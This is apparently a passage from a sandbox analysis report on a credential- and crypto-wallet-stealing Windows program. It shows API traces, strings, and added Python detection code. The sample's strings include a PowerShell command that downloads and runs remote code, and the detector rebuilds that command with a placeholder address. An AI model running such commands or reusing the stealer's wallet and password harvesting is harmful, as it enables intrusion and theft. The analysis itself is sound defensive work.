                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 4444b74a2a868f9252f40f038b0415b61c1bf4dd9b7bcd2bbb6127beda32d703
                              • Instruction ID: 4f868e10947a5e448c6f051c7a655e6c3dc10ab58ec58b278c08abc5bb890c52
                              • Opcode Fuzzy Hash: 4444b74a2a868f9252f40f038b0415b61c1bf4dd9b7bcd2bbb6127beda32d703
                              • Instruction Fuzzy Hash: 3D517FB1900218ABDF24EFA0DD49FEE77B9FB04705F108198B605A72C1DB746A85CF95
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00687452
                              • HeapFree.KERNEL32(00000000), ref: 00687459
                              • task.LIBCPMTD ref: 00687555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 33f5786276eaf209e50f530d96e8186e72b2ee3e7ffe326908e743d51c9aebb3
                              • Instruction ID: be00fc76eb9cd8657cdeb558cdef36094ccb8fa492b51955a6946a8a2dc56024
                              • Opcode Fuzzy Hash: 33f5786276eaf209e50f530d96e8186e72b2ee3e7ffe326908e743d51c9aebb3
                              • Instruction Fuzzy Hash: 39613CB580011C9BDB24EB50CC55BE9B7B9BF44304F1082E9E689A6141DF70AFC9CFA5
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0068BC9F
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0068BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0068BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0068BDB9
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_680000_file.jbxd as the function above)
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 38a996a53ce870b519aa013f7fbb20251ce05e65fa8fc5aef0ac70a9ab06d81f
                              • Instruction ID: b8b1f8409d98e8cd909572619cedec3c26b8d2eea17923cd6a1b05ed608e1686
                              • Opcode Fuzzy Hash: 38a996a53ce870b519aa013f7fbb20251ce05e65fa8fc5aef0ac70a9ab06d81f
                              • Instruction Fuzzy Hash: FEB12B719201189BDF44FBE0DD96EEE73BEBF14300F40415CF506A6591EE346A49CBAA
                              APIs
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_680000_file.jbxd as the function above)
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: a3994cf969457cde15c60657038b488ee9885195568b9cf470cce0611abc5d6e
                              • Instruction ID: f9f427c572ab6a67ac0c4e0525b1532d487a78faf117dedd3129fc90ed726f3d
                              • Opcode Fuzzy Hash: a3994cf969457cde15c60657038b488ee9885195568b9cf470cce0611abc5d6e
                              • Instruction Fuzzy Hash: AEF0583090820DEFD748AFE0ED1DB6CBB74FB0470BF040199F6498A790EA704B419BA6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00684FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00684FD1
                              • InternetOpenA.WININET(006A0DDF,00000000,00000000,00000000,00000000), ref: 00684FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00685011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00685041
                              • InternetCloseHandle.WININET(?), ref: 006850B9
                              • InternetCloseHandle.WININET(?), ref: 006850C6
                               Memory Dump Source
                               • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_680000_file.jbxd as the function above)
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 0d8a3f328a323e6307e5b9bc4b42c16d9edc667166106e46834a90dfbaa69932
                              • Instruction ID: 484b7ca5b4d2e89440ad203d420dd7a64f0be1a829e6283a07587bbc101438ac
                              • Opcode Fuzzy Hash: 0d8a3f328a323e6307e5b9bc4b42c16d9edc667166106e46834a90dfbaa69932
                              • Instruction Fuzzy Hash: 7331E4B4A0021CABDB24DF54DC89BDDB7B5FB48708F1081D9EA09A7281D7706AC58F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00698426
                              • wsprintfA.USER32 ref: 00698459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0069848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00698499
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0148E2C0,00000000,000F003F,?,00000400), ref: 006984EC
                              • lstrlen.KERNEL32(?), ref: 00698501
                              • RegQueryValueExA.ADVAPI32(00000000,0148E1D0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006A0B34), ref: 00698599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00698608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0069861A
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_680000_file.jbxd as the function above)
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 3cc7d79d73d6e6218b3bbd559e619537b6412b530e9c9303d0cd61305a888e50
                              • Instruction ID: d43f031d78324e430754a0d7ac8fb52dd1c93ca5ba51c03f7c7904f3f0f632ad
                              • Opcode Fuzzy Hash: 3cc7d79d73d6e6218b3bbd559e619537b6412b530e9c9303d0cd61305a888e50
                              • Instruction Fuzzy Hash: 3721D67191022CAFDB68DB54DC85FE9B3B9FB48704F00C598A649A6240DE71AA85CFE4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006976A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006976AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0147C278,00000000,00020119,00000000), ref: 006976DD
                              • RegQueryValueExA.ADVAPI32(00000000,0148E218,00000000,00000000,?,000000FF), ref: 006976FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00697708
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_680000_file.jbxd as the function above)
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: fec9e69d27e84c41e15e5c19e2d0e688c0bd42f15acc8c533baeb688be7d67a6
                              • Instruction ID: eca3a8a2fd42452c9dc7913312eb2aa4cab177b105e3fd6d8e01069622f18d4f
                              • Opcode Fuzzy Hash: fec9e69d27e84c41e15e5c19e2d0e688c0bd42f15acc8c533baeb688be7d67a6
                              • Instruction Fuzzy Hash: 0E0162B5A04208BBEB04DBE4DC4DFBEB7BDFB48705F104054FA04EB290D67099048B51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0069773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0147C278,00000000,00020119,006976B9), ref: 0069775B
                              • RegQueryValueExA.ADVAPI32(006976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0069777A
                              • RegCloseKey.ADVAPI32(006976B9), ref: 00697784
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_680000_file.jbxd as the function above)
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: e079cccb25b1c0f5a72a43c77416fe0d1fdf9d50b91cb191057724721e04f7db
                              • Instruction ID: f23030703108f302c0a53459626327028e8a21bd1548e73eff2321a411ba3e0a
                              • Opcode Fuzzy Hash: e079cccb25b1c0f5a72a43c77416fe0d1fdf9d50b91cb191057724721e04f7db
                              • Instruction Fuzzy Hash: AB01FFB5A40308BBEB04DBE4DC4AFAEB7B8FB48705F104559FA05A7281DA715A008B51
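The call lists above are easier to triage once the numeric arguments are read back as Win32 constants and each function's sequence is matched against a few behavioural patterns. The following Python is an added example for this page, not part of the Joe Sandbox report or of the sample: it parses the IDA plugin's own bullet lines (copied verbatim from the functions at 0068733A, 0068BC9F, 00684FCA and 006976A4 above), decodes registry roots, registry access masks and WinINet flags by parameter position, and flags the RegEnumValue/StrStr("Password") scan, the wallet.keys/AccountId string harvesting, the InternetOpenUrl/InternetReadFile download loop and the KEY_WOW64_64KEY registry read. The snippet labels, rule names and the deliberately small constant tables are this example's own assumptions; the tables cover only values that occur in this report, so any other bit is left as hex.

```python
import re

# Call lines copied verbatim from this report's per-function "APIs" lists; the labels
# (rule name @ first ref address) are this example's own, not the report's.
REPORT_SNIPPETS = {
    "registry_password_scan @ 0068733A": """\
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
""",
    "wallet_token_harvest @ 0068BC9F": """\
  • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\\Monero\\wallet.keys,006A0E17), ref: 0069A9C5
• StrStrA.SHLWAPI(00000000,AccountId), ref: 0068BCCD
""",
    "download @ 00684FCA": """\
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00685011
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00685041
""",
    "os_version @ 006976A4": """\
• RegOpenKeyExA.ADVAPI32(80000002,0147C278,00000000,00020119,00000000), ref: 006976DD
""",
}

# One plugin line: "• [Part of subcall function ADDR: ]Api.MODULE(args), ref: ADDR"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
HEX_RE = re.compile(r"[0-9A-F]{1,8}")   # the plugin prints unresolved slots as "?"

# Win32 constants, only those occurring in this report; composite rights first so decode_mask() names them first.
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
KEY_SAM = [(0x20019, "KEY_READ"), (0x20006, "KEY_WRITE"), (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")]
INET_FLAGS = [(0x80000000, "INTERNET_FLAG_RELOAD"), (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"),
              (0x00800000, "INTERNET_FLAG_SECURE"), (0x00000100, "INTERNET_FLAG_PRAGMA_NOCACHE")]
# base API name -> {0-based argument index: (parameter name, dict = exact value, list = bitmask)}
ARG_DECODERS = {
    "RegOpenKey": {0: ("hKey", HKEY), 3: ("samDesired", KEY_SAM)},
    "InternetOpenUrl": {4: ("dwFlags", INET_FLAGS)},
}
CREDENTIAL_STRINGS = ("wallet.keys", "token_service", "AccountTokens", "AccountId")

def base(api):
    """Drop the A/W (and Ex) suffix so RegOpenKeyExA and RegOpenKeyExW compare equal."""
    return re.sub(r"(?:Ex)?[AW]?$", "", api)

def parse_trace(text):
    """Turn plugin bullet lines into dicts (api, mod, args, ref, sub); other lines are skipped."""
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        rec = m.groupdict()
        rec["args"] = [a.strip() for a in rec["args"].split(",")] if rec["args"] else []
        calls.append(rec)
    return calls

def decode_mask(value, table):
    """Render a bitmask as OR-ed constant names; bits the table does not know stay as hex."""
    names, rest = [], value
    for mask, name in table:
        if rest & mask == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"

def decode_args(call):
    """Decode the numeric arguments of one call by parameter position."""
    out = {}
    for idx, (pname, table) in ARG_DECODERS.get(base(call["api"]), {}).items():
        if idx < len(call["args"]) and HEX_RE.fullmatch(call["args"][idx]):
            value = int(call["args"][idx], 16)
            out[pname] = table.get(value, f"0x{value:X}") if isinstance(table, dict) else decode_mask(value, table)
    return out

def find_indicators(calls):
    """Behavioural rules over one function's calls (this example's heuristics, not the report's)."""
    names = [base(c["api"]) for c in calls]
    hits = []
    if "RegEnumValue" in names:
        start = names.index("RegEnumValue")
        if any(n == "StrStr" and "Password" in c["args"] for n, c in zip(names[start:], calls[start:])):
            hits.append("registry_password_scan")   # enumerate values, then grep them for "Password"
    if any(s in a for c in calls for a in c["args"] for s in CREDENTIAL_STRINGS):
        hits.append("wallet_or_token_strings")      # wallet / token-store paths passed as strings
    if "InternetOpenUrl" in names and "InternetReadFile" in names[names.index("InternetOpenUrl"):]:
        hits.append("wininet_download")             # open a URL, then read it in a loop
    if any("KEY_WOW64_64KEY" in decode_args(c).get("samDesired", "") for c in calls):
        hits.append("wow64_64bit_hive_read")        # explicitly asks for the native 64-bit registry view
    return hits

def analyse_report(snippets=REPORT_SNIPPETS):
    """Per function: every call with its decoded arguments, plus the indicators that fired."""
    report = {}
    for label, text in snippets.items():
        calls = parse_trace(text)
        report[label] = {"calls": [(c["api"], decode_args(c)) for c in calls],
                         "indicators": find_indicators(calls)}
    return report

if __name__ == "__main__":
    for label, result in analyse_report().items():
        print(label, result["indicators"], [d for _, d in result["calls"] if d])
```

Two details the decoding makes explicit. InternetOpenUrlA's 04000100 is INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE: the fetch is forced to the origin server and the response is not written to the WinINet cache, so the usual cache artefact of a download is absent. Both version lookups open HKLM with 00020119 = KEY_READ|KEY_WOW64_64KEY, a flag that only matters for a 32-bit process on 64-bit Windows, where it bypasses WOW64 registry redirection. Separately, GetProcessHeap takes no parameters, so the values the plugin prints for it are stack slots at the call site; 05F5E0FF (99 999 999) at 00684FCA is plausibly the size handed to the following RtlAllocateHeap, which would make the download buffer roughly 95 MiB. That last point is an inference from the trace, not something the report states.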
                              APIs
                              • CreateFileA.KERNEL32(:i,80000000,00000003,00000000,00000003,00000080,00000000,?,00693AEE,?), ref: 006992FC
                              • GetFileSizeEx.KERNEL32(000000FF,:i), ref: 00699319
                              • CloseHandle.KERNEL32(000000FF), ref: 00699327
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_680000_file.jbxd as the function above)
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :i$:i
                              • API String ID: 1378416451-3159782484
                              • Opcode ID: fa9ff69ce0106284e29a6f71f51700d4b72881d024939a2a0cc4a1aa7005de83
                              • Instruction ID: b6483a82c526e8679f64a02452f71716c278dff5426dab02b160c6d990979f93
                              • Opcode Fuzzy Hash: fa9ff69ce0106284e29a6f71f51700d4b72881d024939a2a0cc4a1aa7005de83
                              • Instruction Fuzzy Hash: F1F01475E40208ABDF14DFB4DC49F9E77BABB48720F108258AA91A72C0D671AA018B60
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                               Memory Dump Source
                               • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true (same associated dumps and IDA snapshot hcaresult_0_2_680000_file.jbxd as the function above)
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 11e7786939399dafd02f473276b2a185c402d62c46f62af2909560beddbda477
                              • Instruction ID: 765e87513dbaaae75a2fdaa2f3b445dde7baf82764d28dc5f07e325306fbc69e
                              • Opcode Fuzzy Hash: 11e7786939399dafd02f473276b2a185c402d62c46f62af2909560beddbda477
                              • Instruction Fuzzy Hash: DC31F3B4A00209EFDB18DF94C985BEE77BABF48304F108258E911A7390D775AA41CFA1
                              APIs
                              • lstrcat.KERNEL32(?,0148E5F0), ref: 006947DB
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00694801
                              • lstrcat.KERNEL32(?,?), ref: 00694820
                              • lstrcat.KERNEL32(?,?), ref: 00694834
                              • lstrcat.KERNEL32(?,0147B658), ref: 00694847
                              • lstrcat.KERNEL32(?,?), ref: 0069485B
                              • lstrcat.KERNEL32(?,0148DA20), ref: 0069486F
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 00698D90: GetFileAttributesA.KERNEL32(00000000,?,00681B54,?,?,006A564C,?,?,006A0E1F), ref: 00698D9F
                                • Part of subcall function 00694570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00694580
                                • Part of subcall function 00694570: RtlAllocateHeap.NTDLL(00000000), ref: 00694587
                                • Part of subcall function 00694570: wsprintfA.USER32 ref: 006945A6
                                • Part of subcall function 00694570: FindFirstFileA.KERNEL32(?,?), ref: 006945BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: db0faa8aeac9e54bec5eacabfa5c1789ea3bef9fef31d560ddf27f1ea503c7b2
                              • Instruction ID: d5c2a67e9a39eb1cbaa07e4991f9ca75f096378449b7f9dab660a76c21a7b2e0
                              • Opcode Fuzzy Hash: db0faa8aeac9e54bec5eacabfa5c1789ea3bef9fef31d560ddf27f1ea503c7b2
                              • Instruction Fuzzy Hash: 37316EB290021CABCB54FBB0DC85EE9737DBB48704F40459DB31996081EE749689CB9A
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00692D85
                              Strings
                              • <, xrefs: 00692D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00692D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00692CC4
                              • ')", xrefs: 00692CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: a52cfcf191093cf4dfbc2cd743a1e6441c92277635060ce7b0825e4cc20ebaea
                              • Instruction ID: 2cdf2450af6432163caf6e7ac4337061ccc5120c63ebada4283a0595b62eb039
                              • Opcode Fuzzy Hash: a52cfcf191093cf4dfbc2cd743a1e6441c92277635060ce7b0825e4cc20ebaea
                              • Instruction Fuzzy Hash: 3541CB718102189ADF54FBE0C992BEDB7BABF14300F40411DE006A7591DF746A4ACFDA
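The entry above is the report's clearest behavioural finding: the sample concatenates the hard-coded path C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe with the argument string -nop -c "iex(New-Object Net.WebClient).DownloadString(' ... ')" and launches it through ShellExecuteEx at 00692D85 (-nop is -NoProfile, -c is -Command, iex is Invoke-Expression). The 0000003C passed to ShellExecuteEx is the cbSize field, 60 bytes being sizeof(SHELLEXECUTEINFOA) on 32-bit Windows; the stray "<" string at 00692D39 is almost certainly the same 0x3C immediate picked up by the string scan. The stage-two URL is assembled at runtime between the two string fragments and is not recoverable from the listing. The same entry's subcall at 0069A9B0 references the string \Monero\wallet.keys, one of the stealer's wallet targets. The Python below is an added example, not code from the report or from the Stealc sample: it runs two rules over constructed Sysmon-style events (the parent path, the 203.0.113.10 URL and the allowlist of wallet applications are assumptions), flags the download cradle and extracts its URL, and flags wallet-key access by anything other than a wallet application.

```python
"""Flag the PowerShell download cradle and wallet-file access seen in this report.

Added example for triage, not code from the report or the sample. Event shapes
and all sample events below are constructed; the parent path, URL and host are
illustrative only.
"""
import re
from urllib.parse import urlsplit

# Command line as the sample assembles it: powershell path + -nop -c + cradle.
# The URL is constructed (documentation range); the report shows only the
# DownloadString(' ... ') wrapper, never the address.
CRADLE_CMD = ('"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" -nop -c '
              '"iex(New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/s.ps1\')"')

# Constructed events in a Sysmon-like shape (ID 1 process creation, file access).
SAMPLE_EVENTS = [
    {"type": "process_create", "parent_image": r"C:\Users\user\Desktop\file.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": CRADLE_CMD},
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"type": "file_access", "image": r"C:\Users\user\Desktop\file.exe",
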